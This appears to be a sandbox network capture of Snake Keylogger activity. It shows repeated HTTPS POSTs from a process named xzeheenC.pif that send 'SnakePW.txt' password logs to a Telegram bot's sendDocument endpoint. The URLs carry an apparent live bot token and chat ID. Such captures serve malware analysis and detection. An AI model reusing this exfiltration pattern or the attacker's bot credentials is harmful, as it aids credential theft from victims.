                                                                                                                      Date: Wed, 18 Dec 2024 15:18:30 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:30 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 30 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418958,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535109,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      76192.168.2.550038149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:29 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd22ac30a66dbf
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:29 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 61 63 33 30 61 36 36 64 62 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd22ac30a66dbfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:30 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:30 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:30 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 31 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418959,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535110,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      77192.168.2.550039149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:29 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd24f09b604f03
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:29 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 66 30 39 62 36 30 34 66 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd24f09b604f03Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:30 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:30 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:30 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 31 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418961,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535110,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      78192.168.2.550044149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:31 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd22c3003a5e58
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:31 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 63 33 30 30 33 61 35 65 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd22c3003a5e58Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:32 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:31 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:32 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 31 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418964,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535111,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      79192.168.2.550045149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:31 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd22efb27445d5
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:31 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 65 66 62 32 37 34 34 35 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd22efb27445d5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:32 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:32 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:32 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 31 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418966,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535112,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      80192.168.2.550046149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:31 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2587cc98b653
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:31 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 38 37 63 63 39 38 62 36 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2587cc98b653Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:32 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:32 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:32 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 31 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418967,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535112,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      81192.168.2.550049149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:33 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd22ff41348b47
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:33 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 66 66 34 31 33 34 38 62 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd22ff41348b47Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:34 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:34 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:34 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 31 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418970,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535114,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      82192.168.2.550052149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:33 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd232b76f6085e
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:33 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 32 62 37 36 66 36 30 38 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd232b76f6085eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
